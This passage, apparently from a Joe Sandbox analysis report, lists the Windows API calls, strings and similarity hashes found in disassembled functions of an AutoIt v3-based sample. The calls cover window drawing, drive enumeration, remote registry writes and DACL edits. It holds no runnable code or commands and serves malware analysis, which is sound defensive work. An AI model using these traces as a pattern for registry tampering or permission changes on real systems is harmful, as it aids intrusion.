                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00C87C68
                                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00C87C9A
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C87CBC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColor.USER32(00000012), ref: 00C87E5B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SetTextColor.GDI32(?,00C87B2D), ref: 00C87E5F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColorBrush.USER32(0000000F), ref: 00C87E75
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColor.USER32(0000000F), ref: 00C87E80
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetSysColor.USER32(00000011), ref: 00C87E9D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C87EAB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SelectObject.GDI32(?,00000000), ref: 00C87EBC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SetBkColor.GDI32(?,?), ref: 00C87EC5
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: SelectObject.GDI32(?,?), ref: 00C87ED2
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00C87EF1
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C87F08
                                                                                                                                                                                                                                                                              • Part of subcall function 00C87E22: GetWindowLongW.USER32(?,000000F0), ref: 00C87F15
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                            • Opcode ID: 230c861809706d42cae9b75cfd45dcb168c8f29b4657dbbce19aba3bb48287b7
                                                                                                                                                                                                                                                                            • Instruction ID: f0d01dd99784ca0d49034def48af3f15e3714a594a80d0abb0979b6ae418b9c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 230c861809706d42cae9b75cfd45dcb168c8f29b4657dbbce19aba3bb48287b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAA15972008301AFDB11AF64DC48F6EBBA9FF49325F200B19FA63961E0E775D9448B59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 00BF16B4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C32B07
                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C32B40
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C32F85
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF1488,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00BF1865
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00C32FC1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C32FD8
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C32FEE
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C32FF9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: a1d2d1e1d324c7c5fa19276efdbfaa54194127bfadf3e8ba4b126f59e3f921e2
                                                                                                                                                                                                                                                                            • Instruction ID: cd3f3f0681d175dc495800f764df7a8ec4dd50bfa228e824bb9c02ba1a201a8b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1d2d1e1d324c7c5fa19276efdbfaa54194127bfadf3e8ba4b126f59e3f921e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A712BC30210205EFDB25DF18D884BBABBE5FB44304F1889A9F5A5DB261C731ED86DB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00C7319B
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C732C7
                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C73306
                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C73316
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C7335D
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C73369
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C733B2
                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C733C1
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C733D1
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C733D5
                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C733E5
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C733EE
                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00C733F7
                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C73423
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C7343A
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C7347A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C7348E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C7349F
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C734D4
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C734DF
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C734EA
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C734F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C65532
                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00C8DC30,?,\\.\,00C8DCD0), ref: 00C6560F
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00C8DC30,?,\\.\,00C8DCD0), ref: 00C6577B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C81BC4
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C81BD9
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C81BE0
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C81C35
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C81C55
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C81C89
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C81CA7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C81CB9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C81CCE
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C81CE1
                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00C81D3D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C81D58
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C81D6C
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C81D84
                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00C81DAA
                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00C81DC4
                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 00C81DDB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C81E46
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C80D81
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80DBB
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80E25
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80E8D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C80F11
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C80F61
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C80FA0
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FD52: _wcslen.LIBCMT ref: 00C0FD5D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C52BA5
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C52BD7
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF25F8
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00BF2600
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF262B
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00BF2633
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00BF2658
                                                                                                                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BF2675
                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BF2685
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BF26B8
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BF26CC
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00BF26EA
                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00BF2706
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF2711
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetCursorPos.USER32(?), ref: 00BF19E1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: ScreenToClient.USER32(00000000,?), ref: 00BF19FE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000001), ref: 00BF1A23
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000002), ref: 00BF1A3D
                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00BF199C), ref: 00BF2738
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                            • Opcode ID: e7e8e5d326dbcfa33351a482fdc6bfa46bc3c6ef182187338162f7952e3499ae
                                                                                                                                                                                                                                                                            • Instruction ID: 619d4e01f6c8e5567247635ee3a9c6ee871517a3cd1c55ed809c2059c6aeff70
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7e8e5d326dbcfa33351a482fdc6bfa46bc3c6ef182187338162f7952e3499ae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16B15A71A00209EFDB14DFA8CC95BAE7BB5FB48314F104229FA16AB2D0DB74E941CB55
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51A60
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A6C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A82
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C51A99
                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C51741
                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C51775
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C5178C
                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C517C6
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C517E2
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C517F9
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C51801
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C51808
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C51829
                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C51830
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C5185F
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C51881
                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C51893
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C518BA
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518C1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C518CA
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518D1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C518DA
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518E1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C518ED
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C518F4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: GetProcessHeap.KERNEL32(00000008,00C514FD,?,00000000,?,00C514FD,?), ref: 00C51AED
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C514FD,?), ref: 00C51AF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C514FD,?), ref: 00C51B03
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6ac1046f177f772569c710c3aebc92a0c758ddaf2b84f10793c533f2ad43547c
                                                                                                                                                                                                                                                                            • Instruction ID: 20134c8131e663a76bd3fd25aafd0c8006064e4d22eea0754c5c0d9645c2d757
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ac1046f177f772569c710c3aebc92a0c758ddaf2b84f10793c533f2ad43547c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A7159B6D00209ABDF20DFA5DC48FAEBBB8FF04361F194125FD25A6190D7319A49CB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7CF1D
                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C8DCD0,00000000,?,00000000,?,?), ref: 00C7CFA4
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C7D004
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D054
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D0CF
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C7D112
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C7D221
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C7D2AD
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7D2E1
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7D2EE
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C7D3C0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                            • Opcode ID: d33f8307b4dcf35e80d571371df85222e580899fe85537744783a5c4f4037468
                                                                                                                                                                                                                                                                            • Instruction ID: fd46919342592fa2b2db9cb37bd4cee8ed035ec30082774ba0df8d28257f0548
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d33f8307b4dcf35e80d571371df85222e580899fe85537744783a5c4f4037468
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A1237356042059FDB14EF14C881B2AB7F5EF89714F14889DF99A9B3A2CB31ED46CB81
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C81462
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8149D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C814F0
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C81526
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C815A2
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8161D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FD52: _wcslen.LIBCMT ref: 00C0FD5D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C53535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C53547
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
